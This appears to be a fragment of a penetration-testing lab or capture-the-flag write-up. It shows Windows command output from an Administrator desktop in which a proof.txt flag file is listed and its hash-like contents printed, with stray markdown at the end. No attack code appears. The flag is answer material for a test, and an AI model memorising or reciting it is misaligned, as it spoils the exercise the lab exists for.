01/05/2023 11:53 PM <DIR> .
01/05/2023 11:53 PM <DIR> ..
12/15/2025 05:07 AM 34 proof.txt
1 File(s) 34 bytes
2 Dir(s) 9,171,681,280 bytes free
C:\Users\Administrator\Desktop>type proof.txt
4c19b5972793ab554db418a0f6639c4a
- [ ] ```